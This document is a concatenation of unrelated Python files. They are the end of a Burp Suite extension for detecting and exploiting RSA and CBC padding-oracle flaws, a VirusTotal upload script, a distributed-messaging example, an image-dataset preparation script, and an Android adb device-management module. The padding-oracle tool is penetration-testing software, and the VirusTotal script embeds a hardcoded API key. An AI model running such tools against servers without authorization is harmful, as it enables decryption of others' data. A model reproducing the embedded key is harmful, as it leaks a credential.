self.DisplayOutput_PKCS15("Payload:\n{}\n".format(payload))
self.DisplayOutput_PKCS15("Response:\n{}\n\n".format(unhexlify(hexlify(testValidPadResponse))))
# Display the conclusion
self.DisplayOutput_PKCS15("The server is likely vulnerable to padding oracle attack\n")
else:
# Display the conclusion
self.DisplayOutput_PKCS15("The server is not vulnerable to padding oracle attack\n")
def InputValidation_PKCS15(self, mode):
try:
# Set default font display to black
self.__jTextAreaOutputPKCS15.setForeground(Color(0, 0, 0))
# make sure the previous thread has terminated
if self.gOpThreadPKCS15!=None and self.gOpThreadPKCS15.isAlive():
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Previous thread is still running! Please click stop button to terminate it", "Warning", JOptionPane.WARNING_MESSAGE)
return False
# reset the variables
self.gThreadStopPKCS15 = False
self.__jTextAreaOutputPKCS15.setText("")
self.gQueriesPKCS15 = 0
# check if the payload is selected
if self.gSelectedPayloadPKCS15==None:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Incorrect payload selection!", "Error", JOptionPane.ERROR_MESSAGE)
return False
# Get public exponent
exponent = re.sub('\W+','', self.__textPublicExpPKCS15.getText())
if exponent=="":
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Please provide the RSA public exponent in decimal!", "Error", JOptionPane.ERROR_MESSAGE)
return False
self.gExponentPKCS15 = int(exponent, 10)
# Get public modulus
modulus = re.sub('\W+','',self.__textPublicModPKCS15.getText())
if modulus=="":
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Please provide the RSA public modulus in decimal!", "Error", JOptionPane.ERROR_MESSAGE)
return False
self.gModulusPKCS15 = int(modulus, 10)
# Compute the ByteLength
self.gByteLenPKCS15 = (self.gModulusPKCS15.bit_length() + 7) // 8  # round up for moduli whose bit length is not a multiple of 8
# Get valid or invalid padding message
if mode=="decrypt":
self.gPadMsgSelPKCS15 = self.__jComboBoxPadMsgPKCS15.getSelectedItem()
padmsg = self.__textPadMessagePKCS15.getText()
if padmsg=="":
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Please provide part or full of the valid or invalid padding response!", "Error", JOptionPane.ERROR_MESSAGE)
return False
self.gPadMsgPKCS15 = padmsg
return True
except Exception as e:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, e, "Exception", JOptionPane.ERROR_MESSAGE)
return False
def PKCS15(self, invocation):
# Initialize variables
self.gHttpRequestRawStringPKCS15=""
self.gHttpRequestStringPKCS15=""
self.gPayloadPKCS15=""
self.gPayloadFormatPKCS15=""
self.gSelectedPayloadPKCS15=None
self.gOpThreadPKCS15 = None
self.gIsPayloadUrlEncodedPKCS15 = False
# enable the format dropdown box and url encode checkbox
self.__jComboBoxFormatPKCS15.setSelectedIndex(0)
self.__jComboBoxFormatPKCS15.setEnabled(True)
self.__jCheckBoxUrlEncodedPKCS15.setSelected(False)
self.__jCheckBoxUrlEncodedPKCS15.setEnabled(True)
# Get and set the http request message
invMessages = invocation.getSelectedMessages()
if len(invMessages) == 0:
return
self.gReqResPKCS15 = invMessages[0]
self.gHttpRequestRawStringPKCS15 = self._helpers.bytesToString(self.gReqResPKCS15.getRequest())
self.__jEditorPaneReqPKCS15.setText(self.gHttpRequestRawStringPKCS15)
# Reset all the fields
self.__textPublicExpPKCS15.setText("")
self.__textPublicModPKCS15.setText("")
self.__textPadMessagePKCS15.setText("")
self.__jTextAreaOutputPKCS15.setText("")
self.__jComboBoxUpdateIntervalPKCS15.setSelectedIndex(0)
# switch to the PKCS1_5 tab
self._jPaddingOracleTab.setSelectedComponent(self.__jPanelPKCS15)
parentTab = self._jPaddingOracleTab.getParent()
parentTab.setSelectedComponent(self._jPaddingOracleTab)
def selectPayload_PKCS15(self, button):
# Retrieve the selected payload (getSelectedText() returns None when nothing is selected)
payload = self.__jEditorPaneReqPKCS15.getSelectedText()
# Store the selected payload
self.gSelectedPayloadPKCS15 = payload
if(payload!=None):
    payload = payload.replace("\n", "")
# Check whether the payload is url encoded.
if self.__jCheckBoxUrlEncodedPKCS15.isSelected():
self.gIsPayloadUrlEncodedPKCS15 = True
# Get the payload format and convert it to hex
try:
payload = self.ConverToHexFromPayloadFormat(payload, self.__jComboBoxFormatPKCS15.getSelectedItem(), self.gIsPayloadUrlEncodedPKCS15)
if payload != None:
# validate the payload is hex
unhexlify(payload.encode())
self.gPayloadPKCS15 = payload
self.gPayloadFormatPKCS15 = self.__jComboBoxFormatPKCS15.getSelectedItem()
# Replace the selected payload with #PAYLOAD# so that we can process it during the attack
self.gHttpRequestStringPKCS15 = self.gHttpRequestRawStringPKCS15.replace(self.gSelectedPayloadPKCS15, "#PAYLOAD#")
# Show the selected payload
bytesDisplay = self.gHttpRequestRawStringPKCS15.encode()
insertionPointChar = chr(167)
bytesDisplay = bytesDisplay.replace(self.gSelectedPayloadPKCS15.encode(), insertionPointChar + self.gSelectedPayloadPKCS15.encode() + insertionPointChar)
self.__jEditorPaneReqPKCS15.setText(bytesDisplay)
# Disable the format dropdown box and url encode checkbox
self.__jComboBoxFormatPKCS15.setEnabled(False)
self.__jCheckBoxUrlEncodedPKCS15.setEnabled(False)
except Exception as e:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, e, "Exception", JOptionPane.ERROR_MESSAGE)
return
def testPayload_PKCS15(self, button):
# Perform input validation
initStatus = self.InputValidation_PKCS15("test")
if(initStatus):
# Start the Testing Thread
self.gOpThreadPKCS15 = threading.Thread(target=self.Test_PKCS15)
self.gOpThreadPKCS15.start()
def decryptPayload_PKCS15(self, button):
# Perform input validation
initStatus = self.InputValidation_PKCS15("decrypt")
if(initStatus):
# Start the Decryption Thread
encrypted_string = unhexlify(self.gPayloadPKCS15)
self.gOpThreadPKCS15 = threading.Thread(target=self.Bleichenbacher_PKCS15, args=(encrypted_string,))
self.gOpThreadPKCS15.start()
def stopOperation_PKCS15(self, button):
self.DisplayOutput_PKCS15("Operation halted!\n")
self.gThreadStopPKCS15 = True
def clearPayload_PKCS15(self, button):
if self.gHttpRequestRawStringPKCS15 !="":
self.__jEditorPaneReqPKCS15.setText(self.gHttpRequestRawStringPKCS15)
self.gSelectedPayloadPKCS15 = None
# Enable the format dropdown box and url encode checkbox
self.__jComboBoxFormatPKCS15.setEnabled(True)
self.__jCheckBoxUrlEncodedPKCS15.setEnabled(True)
# *************************************** Common Function ***************************************
def ConvertFromHexToPayloadFormat(self, payload, format, urlEncoded):
try:
# default format is hex
if format=="Base64":
# convert the hex encrypted_string to base64
payload = unhexlify(payload)
payload = self._helpers.base64Encode(payload).decode()
elif format=="Decimal":
# convert the hex encrypted_string to decimal
payload = str(int(payload,16))
# Url Encode the payload if urlencoded checkbox is checked
if(urlEncoded):
payload = self._helpers.urlEncode(payload)
return payload
except Exception as e:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, e, "Exception", JOptionPane.ERROR_MESSAGE)
return None
def ConverToHexFromPayloadFormat(self, payload, format, urlEncoded):
try:
# Check whether the payload is url encoded. If yes, url decode the payload
if (urlEncoded):
payload = self._helpers.urlDecode(payload)
# default format is hex
if format=="Base64":
# check whether the payload is base64
payload = base64.b64decode(payload)
# convert the payload to hex
payload = hexlify(payload).decode()
elif format=="Decimal":
if (payload.isdecimal()==False):
raise ValueError("The payload is not decimal")
# convert the payload to hex
payload = hex(int(payload)).rstrip("L").replace("0x","")
payload = payload.rjust(len(payload)+len(payload)%2,"0")
return payload
except Exception as e:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, e, "Exception", JOptionPane.ERROR_MESSAGE)
return None
def registerExtenderCallbacks(self, callbacks):
# Set up the context menu
self.printInfo()
callbacks.setExtensionName("Padding Oracle Hunter")
callbacks.registerExtensionStateListener(self)
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.registerContextMenuFactory(self)
# Create PKCS GUI
self.setGUI_PKCS7()
self.setGUI_PKCS15()
# Setup PKCS Tabs
self._jPaddingOracleTab = JTabbedPane()
self._jPaddingOracleTab.addTab("PKCS#7", self.__jPanelPKCS7)
self._jPaddingOracleTab.addTab("PKCS#1 v1.5", self.__jPanelPKCS15)
callbacks.customizeUiComponent(self._jPaddingOracleTab)
callbacks.addSuiteTab(self)
def createMenuItems(self, invocation):
# Create a menu item if the appropriate section of the UI is selected
menu = []
# Which part of the interface the user selects
ctx = invocation.getInvocationContext()
# Message Viewer Req will show menu item if selected by the user
if ctx == IContextMenuInvocation.CONTEXT_MESSAGE_EDITOR_REQUEST or ctx == IContextMenuInvocation.CONTEXT_MESSAGE_VIEWER_REQUEST:
menu.append(JMenuItem("PKCS#7", None, actionPerformed=lambda x, inv=invocation: self.PKCS7(inv)))
menu.append(JMenuItem("PKCS#1 v1.5", None, actionPerformed=lambda x, inv=invocation: self.PKCS15(inv)))
return menu if menu else None
def extensionUnloaded(self):
# stop all running threads
self.gThreadStopPKCS7 = True
self.gThreadStopPKCS15 = True
def getTabCaption(self):
return "Padding Oracle Hunter"
def getUiComponent(self):
return self._jPaddingOracleTab
def printInfo(self):
print('Padding Oracle Hunter v1.1\nCreated by: GovTech (Tan Inn Fung)')
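# ------------------------------------------------------------------------------
# Offline sketch (an addition, not part of the extension): the CBC relation the
# PKCS#7 routines above exploit, demonstrated against a local mock oracle built
# on a toy XOR "cipher" instead of HTTP requests. If a forged previous block C1'
# makes the oracle accept padding 0x01, then D(C2)[-1] == C1'[-1] ^ 0x01, so the
# real plaintext byte is D(C2)[-1] ^ C1[-1]. A real oracle validates the full
# pad (stray 0x02 0x02 hits must be ruled out); the mock below checks only the
# last byte to keep the sketch deterministic. Guarded so Burp never runs it.
if __name__ == "__main__":
    import os
    BLOCK = 16
    _key = bytearray(os.urandom(BLOCK))  # toy key: block "decryption" is XOR with it
    def _toy_decrypt(block):
        return bytearray(b ^ k for b, k in zip(block, _key))
    def _mock_oracle(prev_block, target_block):
        p = bytearray(x ^ y for x, y in zip(_toy_decrypt(target_block), prev_block))
        return p[-1] == 0x01  # "valid padding" if the last decrypted byte is 0x01
    # build a ciphertext pair whose last plaintext byte is 'A'
    c1 = bytearray(os.urandom(BLOCK))
    p2 = bytearray(os.urandom(BLOCK - 1)) + bytearray([ord('A')])
    c2 = bytearray(a ^ b ^ k for a, b, k in zip(p2, c1, _key))
    # recover it with at most 256 oracle queries against a forged previous block
    forged = bytearray(os.urandom(BLOCK))
    for guess in range(256):
        forged[-1] = guess
        if _mock_oracle(forged, c2):
            print("recovered byte: %r" % chr((guess ^ 0x01) ^ c1[-1]))
            break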
|
scanFile.py | import os
import threading
from requests import api
import virustotal3.core
import logging
import time
_API_KEY="3d29cdabf6d196748d9b810412d3494c6ebb7a4972427877a5196bc3ceadf01d"
_vsTotUploader=virustotal3.core.Files(api_key=_API_KEY)
_FILE = os.path.abspath("sample.bin")  # placeholder: set this to the path of the file to be scanned
_result=False
_info={}
print(_FILE)
def uploadAndStartScan(vsTotUploader: virustotal3.core.Files,filepath):
uploadId= vsTotUploader.upload(sample=filepath)['data']['id']
logging.info(uploadId)
return uploadId
def waitTillCompleted(apiKey, uploadId):
    global _result
    global _info
    _result = False
    # pass the callable and its args separately; calling the target inline would
    # run it synchronously here instead of on the worker thread
    statusGetter = threading.Thread(name="statusGetter", target=_getStatus, args=(apiKey, uploadId, 2))
    _info = virustotal3.core.get_analysis(apiKey, uploadId)
    waitShow = threading.Thread(name="waitShow", target=_showWaitDialog)
    waitShow.start()
    statusGetter.start()
    statusGetter.join()
    waitShow.join()
def _showWaitDialog():
global _result
lst=['/','|','\\','-','/']
i=0
while (not _result):
print("working ",lst[i],end="\r")
time.sleep(0.1)
i=(i+1)%5
def _getStatus(apiKey,uploadId,sleep):
global _result
global _info
time.sleep(sleep)
while not _result:
info=virustotal3.core.get_analysis(apiKey,uploadId)
logging.debug(f'{info.keys()}')
if(info['data']['attributes']['status']=='completed'):
_result=True
time.sleep(0.1)
_info=info['data']['attributes']['stats']
_showInfo()
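# The two background threads coordinate through the module-level _result flag:
# _getStatus sets it to True once VirusTotal reports the analysis 'completed',
# which also terminates _showWaitDialog's spinner loop.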
def _showInfo():
global _info
print(_info)
upid=uploadAndStartScan(_vsTotUploader,_FILE)
waitTillCompleted(_API_KEY, upid) |
broadcast.py | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import multiprocessing as mp
from maro.communication import Proxy, SessionType
def worker(group_name):
"""
The main worker logic includes initialize proxy and handle jobs from the master.
Args:
group_name (str): Identifier for the group of all communication components.
"""
proxy = Proxy(group_name=group_name,
component_type="worker",
expected_peers={"master": 1})
counter = 0
print(f"{proxy.component_name}'s counter is {counter}.")
    # Non-recurring receive of a message from the proxy.
for msg in proxy.receive(is_continuous=False):
print(f"{proxy.component_name} receive message from {msg.source}.")
if msg.tag == "INC":
counter += 1
print(f"{proxy.component_name} receive INC request, {proxy.component_name}'s count is {counter}.")
proxy.reply(received_message=msg, tag="done")
def master(group_name: str, worker_num: int, is_immediate: bool = False):
"""
The main master logic includes initialize proxy and allocate jobs to workers.
Args:
        group_name (str): Identifier for the group of all communication components.
        worker_num (int): The number of workers.
        is_immediate (bool): If True, run in async mode; otherwise, run in sync mode.
Async Mode: The proxy only returns the session id for sending messages. Based on the local task priority,
you can do something with high priority before receiving replied messages from peers.
Sync Mode: It will block until the proxy returns all the replied messages.
"""
proxy = Proxy(group_name=group_name,
component_type="master",
expected_peers={"worker": worker_num})
if is_immediate:
session_ids = proxy.ibroadcast(tag="INC",
session_type=SessionType.NOTIFICATION)
# do some tasks with higher priority here.
replied_msgs = proxy.receive_by_id(session_ids)
else:
replied_msgs = proxy.broadcast(tag="INC",
session_type=SessionType.NOTIFICATION)
for msg in replied_msgs:
print(f"{proxy.component_name} get receive notification from {msg.source} with message session stage " +
f"{msg.session_stage}.")
if __name__ == "__main__":
"""
This is a single-host multiprocess program used to simulate the communication in the distributed system.
    For the complete usage experience of a distributed cluster, please use the MARO CLI.
"""
mp.set_start_method("spawn")
group_name = "proxy_broadcast_INC_example"
worker_number = 5
is_immediate = True
workers = mp.Pool(worker_number)
master_process = mp.Process(target=master, args=(group_name, worker_number, is_immediate,))
master_process.start()
workers.map(worker, [group_name] * worker_number)
workers.close()
master_process.join()
workers.join()
|
prepare_data.py | import argparse
from io import BytesIO
from multiprocessing import Lock, Process
from multiprocessing.sharedctypes import RawValue
from functools import partial
from PIL import Image
from tqdm import tqdm
from torchvision.transforms import functional as trans_fn
import os
from pathlib import Path
import lmdb
import numpy as np
import time
def resize_and_convert(img, size, resample):
if(img.size[0] != size):
img = trans_fn.resize(img, size, resample)
img = trans_fn.center_crop(img, size)
return img
def image_convert_bytes(img):
buffer = BytesIO()
img.save(buffer, format='png')
return buffer.getvalue()
def resize_multiple(img, sizes=(16, 128), resample=Image.BICUBIC, lmdb_save=False):
lr_img = resize_and_convert(img, sizes[0], resample)
hr_img = resize_and_convert(img, sizes[1], resample)
sr_img = resize_and_convert(lr_img, sizes[1], resample)
if lmdb_save:
lr_img = image_convert_bytes(lr_img)
hr_img = image_convert_bytes(hr_img)
sr_img = image_convert_bytes(sr_img)
return [lr_img, hr_img, sr_img]
def resize_worker(img_file, sizes, resample, lmdb_save=False):
img = Image.open(img_file)
img = img.convert('RGB')
out = resize_multiple(
img, sizes=sizes, resample=resample, lmdb_save=lmdb_save)
return img_file.name.split('.')[0], out
class WorkingContext():
def __init__(self, resize_fn, lmdb_save, out_path, env, sizes):
self.resize_fn = resize_fn
self.lmdb_save = lmdb_save
self.out_path = out_path
self.env = env
self.sizes = sizes
self.counter = RawValue('i', 0)
self.counter_lock = Lock()
def inc_get(self):
with self.counter_lock:
self.counter.value += 1
return self.counter.value
def value(self):
with self.counter_lock:
return self.counter.value
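# WorkingContext is shared by all worker processes: RawValue('i', 0) lives in
# shared memory but provides no synchronization of its own, so the explicit
# Lock serializes the read-modify-write in inc_get().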
def prepare_process_worker(wctx, file_subset):
for file in file_subset:
i, imgs = wctx.resize_fn(file)
lr_img, hr_img, sr_img = imgs
if not wctx.lmdb_save:
lr_img.save(
'{}/lr_{}/{}.png'.format(wctx.out_path, wctx.sizes[0], i.zfill(5)))
hr_img.save(
'{}/hr_{}/{}.png'.format(wctx.out_path, wctx.sizes[1], i.zfill(5)))
sr_img.save(
'{}/sr_{}_{}/{}.png'.format(wctx.out_path, wctx.sizes[0], wctx.sizes[1], i.zfill(5)))
else:
with wctx.env.begin(write=True) as txn:
txn.put('lr_{}_{}'.format(
wctx.sizes[0], i.zfill(5)).encode('utf-8'), lr_img)
txn.put('hr_{}_{}'.format(
wctx.sizes[1], i.zfill(5)).encode('utf-8'), hr_img)
txn.put('sr_{}_{}_{}'.format(
wctx.sizes[0], wctx.sizes[1], i.zfill(5)).encode('utf-8'), sr_img)
curr_total = wctx.inc_get()
if wctx.lmdb_save:
with wctx.env.begin(write=True) as txn:
txn.put('length'.encode('utf-8'), str(curr_total).encode('utf-8'))
def all_threads_inactive(worker_threads):
for thread in worker_threads:
if thread.is_alive():
return False
return True
def prepare(img_path, out_path, n_worker, sizes=(16, 128), resample=Image.BICUBIC, lmdb_save=False):
resize_fn = partial(resize_worker, sizes=sizes,
resample=resample, lmdb_save=lmdb_save)
    files = [p for p in Path(img_path).glob('**/*')]
if not lmdb_save:
os.makedirs(out_path, exist_ok=True)
os.makedirs('{}/lr_{}'.format(out_path, sizes[0]), exist_ok=True)
os.makedirs('{}/hr_{}'.format(out_path, sizes[1]), exist_ok=True)
os.makedirs('{}/sr_{}_{}'.format(out_path,
sizes[0], sizes[1]), exist_ok=True)
else:
env = lmdb.open(out_path, map_size=1024 ** 4, readahead=False)
if n_worker > 1:
# prepare data subsets
multi_env = None
if lmdb_save:
multi_env = env
file_subsets = np.array_split(files, n_worker)
worker_threads = []
wctx = WorkingContext(resize_fn, lmdb_save, out_path, multi_env, sizes)
# start worker processes, monitor results
for i in range(n_worker):
proc = Process(target=prepare_process_worker, args=(wctx, file_subsets[i]))
proc.start()
worker_threads.append(proc)
total_count = str(len(files))
while not all_threads_inactive(worker_threads):
print("{}/{} images processed".format(wctx.value(), total_count))
time.sleep(0.1)
else:
total = 0
for file in tqdm(files):
i, imgs = resize_fn(file)
lr_img, hr_img, sr_img = imgs
if not lmdb_save:
lr_img.save(
'{}/lr_{}/{}.png'.format(out_path, sizes[0], i.zfill(5)))
hr_img.save(
'{}/hr_{}/{}.png'.format(out_path, sizes[1], i.zfill(5)))
sr_img.save(
'{}/sr_{}_{}/{}.png'.format(out_path, sizes[0], sizes[1], i.zfill(5)))
else:
with env.begin(write=True) as txn:
txn.put('lr_{}_{}'.format(
sizes[0], i.zfill(5)).encode('utf-8'), lr_img)
txn.put('hr_{}_{}'.format(
sizes[1], i.zfill(5)).encode('utf-8'), hr_img)
txn.put('sr_{}_{}_{}'.format(
sizes[0], sizes[1], i.zfill(5)).encode('utf-8'), sr_img)
total += 1
if lmdb_save:
with env.begin(write=True) as txn:
txn.put('length'.encode('utf-8'), str(total).encode('utf-8'))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--path', '-p', type=str,
default='{}/Dataset/celebahq_256'.format(Path.home()))
parser.add_argument('--out', '-o', type=str,
default='./dataset/celebahq')
parser.add_argument('--size', type=str, default='64,512')
parser.add_argument('--n_worker', type=int, default=3)
parser.add_argument('--resample', type=str, default='bicubic')
# default save in png format
parser.add_argument('--lmdb', '-l', action='store_true')
args = parser.parse_args()
resample_map = {'bilinear': Image.BILINEAR, 'bicubic': Image.BICUBIC}
resample = resample_map[args.resample]
sizes = [int(s.strip()) for s in args.size.split(',')]
args.out = '{}_{}_{}'.format(args.out, sizes[0], sizes[1])
prepare(args.path, args.out, args.n_worker,
sizes=sizes, resample=resample, lmdb_save=args.lmdb)
|
adb.py | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ADB shell related functions."""
from builtins import str
from future import standard_library
standard_library.install_aliases()
import collections
import glob
import os
import re
import signal
import subprocess
import tempfile
import threading
import time
from base import persistent_cache
from base import utils
from metrics import logs
from system import environment
from system import shell
ADB_TIMEOUT = 1200 # Should be lower than |REBOOT_TIMEOUT|.
BAD_STATE_WAIT = 900
BOOT_WAIT_INTERVAL = 30
DEFAULT_DEVICE_MEMORY_MB = 2048
DEVICE = collections.namedtuple('Device', ['serial', 'path'])
DEVICE_HANG_STRING = None
DEVICE_NOT_FOUND_STRING = 'error: device \'{serial}\' not found'
DEVICE_OFFLINE_STRING = 'error: device offline'
FACTORY_RESET_WAIT = 60
KERNEL_LOG_FILES = [
'/proc/last_kmsg',
'/sys/fs/pstore/console-ramoops',
]
MONKEY_PROCESS_NAME = 'monkey'
REBOOT_TIMEOUT = 3600
RECOVERY_CMD_TIMEOUT = 60
STOP_CVD_WAIT = 20
# Output patterns to parse "lsusb" output.
LSUSB_BUS_RE = re.compile(r'Bus\s+(\d+)\s+Device\s+(\d+):.*')
LSUSB_SERIAL_RE = re.compile(r'\s+iSerial\s+\d\s+(.*)')
# This is a constant value defined in usbdevice_fs.h in Linux system.
USBDEVFS_RESET = ord('U') << 8 | 20
def bad_state_reached():
"""Wait when device is in a bad state and exit."""
persistent_cache.clear_values()
logs.log_fatal_and_exit(
'Device in bad state.', wait_before_exit=BAD_STATE_WAIT)
def copy_local_directory_to_remote(local_directory, remote_directory):
"""Copies local directory contents to a device directory."""
create_directory_if_needed(remote_directory)
if os.listdir(local_directory):
run_command(['push', '%s/.' % local_directory, remote_directory])
def copy_local_file_to_remote(local_file_path, remote_file_path):
"""Copies local file to a device file."""
create_directory_if_needed(os.path.dirname(remote_file_path))
run_command(['push', local_file_path, remote_file_path])
def copy_remote_directory_to_local(remote_directory, local_directory):
"""Copies local directory contents to a device directory."""
run_command(['pull', '%s/.' % remote_directory, local_directory])
def copy_remote_file_to_local(remote_file_path, local_file_path):
"""Copies device file to a local file."""
shell.create_directory(
os.path.dirname(local_file_path), create_intermediates=True)
run_command(['pull', remote_file_path, local_file_path])
def create_directory_if_needed(device_directory):
"""Creates a directory on the device if it doesn't already exist."""
run_shell_command(['mkdir', '-p', device_directory])
def directory_exists(directory_path):
"""Return whether a directory exists or not."""
expected = '0'
result = run_shell_command(
'\'test -d "%s"; echo $?\'' % directory_path, log_error=False)
return result == expected
def execute_command(cmd, timeout=None, log_error=True):
"""Spawns a subprocess to run the given shell command."""
so = []
output_dest = tempfile.TemporaryFile()
# pylint: disable=subprocess-popen-preexec-fn
pipe = subprocess.Popen(
cmd,
executable='/bin/bash',
stdout=output_dest,
stderr=subprocess.STDOUT,
shell=True,
preexec_fn=lambda: signal.signal(signal.SIGPIPE, signal.SIG_DFL),
bufsize=0)
def run():
"""Thread target function that waits for subprocess to complete."""
try:
pipe.communicate()
output_dest.seek(0)
output = output_dest.read()
output_dest.close()
if output:
so.append(output)
    except OSError as _:
      output = None
      logs.log_warn('Failed to retrieve stdout from: %s' % cmd)
    if pipe.returncode:
      if log_error:
        logs.log_warn(
            '%s returned %d error code.' % (cmd, pipe.returncode),
            output=output)
thread = threading.Thread(target=run)
thread.start()
thread.join(timeout)
  if thread.is_alive():
try:
pipe.kill()
except OSError:
# Can't kill a dead process.
pass
return None
bytes_output = b''.join(so)
return bytes_output.strip().decode('utf-8', errors='ignore')
def factory_reset():
"""Reset device to factory state."""
if is_gce():
# We cannot recover from this since there can be cases like userdata image
# corruption in /data/data. Till the bug is fixed, we just need to wait
# for reimage in next iteration.
bad_state_reached()
# A device can be stuck in a boot loop due to a bad clang library update.
# Reverting that can bring a device back to good state.
revert_asan_device_setup_if_needed()
run_as_root()
run_shell_command([
'am', 'broadcast', '-a', 'android.intent.action.MASTER_CLEAR', '-n',
'android/com.android.server.MasterClearReceiver'
])
# Wait until the reset is complete.
time.sleep(FACTORY_RESET_WAIT)
def file_exists(file_path):
"""Return whether a file exists or not."""
expected = '0'
result = run_shell_command(
'\'test -f "%s"; echo $?\'' % file_path, log_error=False)
return result == expected
def get_adb_command_line(adb_cmd):
"""Return adb command line for running an adb command."""
device_serial = environment.get_value('ANDROID_SERIAL')
adb_cmd_line = '%s -s %s %s' % (get_adb_path(), device_serial, adb_cmd)
return adb_cmd_line
def get_adb_path():
"""Return path to ADB binary."""
adb_path = environment.get_value('ADB')
if adb_path:
return adb_path
return os.path.join(environment.get_platform_resources_directory(), 'adb')
def get_device_state():
"""Return the device status."""
state_cmd = get_adb_command_line('get-state')
return execute_command(state_cmd, timeout=RECOVERY_CMD_TIMEOUT)
def get_fastboot_command_line(fastboot_cmd):
"""Return fastboot command line for running a fastboot command."""
fastboot_cmd_line = '%s %s' % (get_fastboot_path(), fastboot_cmd)
return fastboot_cmd_line
def get_fastboot_path():
"""Return path to fastboot binary."""
return os.path.join(environment.get_platform_resources_directory(),
'fastboot')
def get_file_checksum(file_path):
"""Return file's md5 checksum."""
if not file_exists(file_path):
return None
return run_shell_command(['md5sum', '-b', file_path])
def get_file_size(file_path):
"""Return file's size."""
if not file_exists(file_path):
return None
return int(run_shell_command(['stat', '-c%s', file_path]))
def get_kernel_log_content():
"""Return content of kernel logs."""
kernel_log_content = ''
for kernel_log_file in KERNEL_LOG_FILES:
kernel_log_content += read_data_from_file(kernel_log_file) or ''
return kernel_log_content
def get_ps_output():
"""Return ps output for all processes."""
return run_shell_command(['ps', '-A'])
def get_process_and_child_pids(process_name):
"""Return process and child pids matching a process name."""
pids = []
ps_output_lines = get_ps_output().splitlines()
while True:
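    # Fixed-point iteration: rescan the ps output until a pass adds no new
    # pids, so children and grandchildren are collected transitively.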
old_pids_length = len(pids)
for line in ps_output_lines:
data = line.split()
# Make sure we have a valid pid and parent pid.
try:
# PID is in the second column.
line_process_pid = int(data[1])
# Parent PID is in the third column.
line_parent_pid = int(data[2])
      except (IndexError, ValueError):
        continue
# If we have already processed this pid, no more work to do.
if line_process_pid in pids:
continue
# Process name is in the last column.
# Monkey framework instances (if any) are children of our process launch,
# so include these in pid list.
line_process_name = data[-1]
if (process_name in line_process_name or
MONKEY_PROCESS_NAME in line_process_name):
if process_name == line_process_name:
pids.insert(0, line_process_pid)
else:
pids.append(line_process_pid)
continue
# Add child pids to end.
if line_parent_pid in pids:
pids.append(line_process_pid)
new_pids_length = len(pids)
if old_pids_length == new_pids_length:
break
return pids
def get_property(property_name):
"""Return property's value."""
return run_shell_command(['getprop', property_name])
def hard_reset():
"""Perform a hard reset of the device."""
if is_gce():
# There is no recovery step at this point for a gce bot, so just exit
# and wait for reimage on next iteration.
bad_state_reached()
# For physical device.
# Try hard-reset via sysrq-trigger (requires root).
hard_reset_sysrq_cmd = get_adb_command_line(
'shell echo b \\> /proc/sysrq-trigger')
execute_command(hard_reset_sysrq_cmd, timeout=RECOVERY_CMD_TIMEOUT)
# Try soft-reset now (does not require root).
soft_reset_cmd = get_adb_command_line('reboot')
execute_command(soft_reset_cmd, timeout=RECOVERY_CMD_TIMEOUT)
def is_gce():
"""Returns if we are running in GCE environment."""
android_serial = environment.get_value('ANDROID_SERIAL')
return android_serial.startswith('127.0.0.1:')
def kill_processes_and_children_matching_name(process_name):
"""Kills process along with children matching names."""
process_and_child_pids = get_process_and_child_pids(process_name)
if not process_and_child_pids:
return
kill_command = ['kill', '-9'] + process_and_child_pids
run_shell_command(kill_command)
def read_data_from_file(file_path):
"""Return device's file content."""
if not file_exists(file_path):
return None
return run_shell_command(['cat', '"%s"' % file_path])
def reboot():
"""Reboots device."""
run_command('reboot')
def start_gce_device():
"""Start the gce device."""
cvd_dir = environment.get_value('CVD_DIR')
cvd_bin_dir = os.path.join(cvd_dir, 'bin')
launch_cvd_path = os.path.join(cvd_bin_dir, 'launch_cvd')
device_memory_mb = environment.get_value('DEVICE_MEMORY_MB',
DEFAULT_DEVICE_MEMORY_MB)
launch_cvd_command_line = (
'{launch_cvd_path} -daemon -memory_mb {device_memory_mb}'.format(
launch_cvd_path=launch_cvd_path, device_memory_mb=device_memory_mb))
execute_command(launch_cvd_command_line)
def stop_gce_device():
"""Stops the gce device."""
cvd_dir = environment.get_value('CVD_DIR')
cvd_bin_dir = os.path.join(cvd_dir, 'bin')
stop_cvd_path = os.path.join(cvd_bin_dir, 'stop_cvd')
execute_command(stop_cvd_path, timeout=RECOVERY_CMD_TIMEOUT)
time.sleep(STOP_CVD_WAIT)
def recreate_gce_device():
"""Recreate gce device, restoring from backup images."""
logs.log('Reimaging gce device.')
cvd_dir = environment.get_value('CVD_DIR')
stop_gce_device()
# Delete all existing images.
image_dir = cvd_dir
for image_file_path in glob.glob(os.path.join(image_dir, '*.img')):
shell.remove_file(image_file_path)
# Restore images from backup.
backup_image_dir = os.path.join(cvd_dir, 'backup')
for image_filename in os.listdir(backup_image_dir):
image_src = os.path.join(backup_image_dir, image_filename)
image_dest = os.path.join(image_dir, image_filename)
shell.copy_file(image_src, image_dest)
start_gce_device()
def remount():
"""Remount /system as read/write."""
run_as_root()
run_command('remount')
wait_for_device()
run_as_root()
def remove_directory(device_directory, recreate=False):
"""Delete everything inside of a device directory and recreate if needed."""
run_shell_command('rm -rf %s' % device_directory, root=True)
if recreate:
create_directory_if_needed(device_directory)
def remove_file(file_path):
"""Remove file."""
run_shell_command('rm -f %s' % file_path, root=True)
def reset_device_connection():
"""Reset the connection to the physical device through USB. Returns whether
or not the reset succeeded."""
if is_gce():
stop_gce_device()
start_gce_device()
else:
# Physical device. Try restarting usb.
reset_usb()
# Check device status.
state = get_device_state()
if state != 'device':
logs.log_warn('Device state is %s, unable to recover using usb reset/'
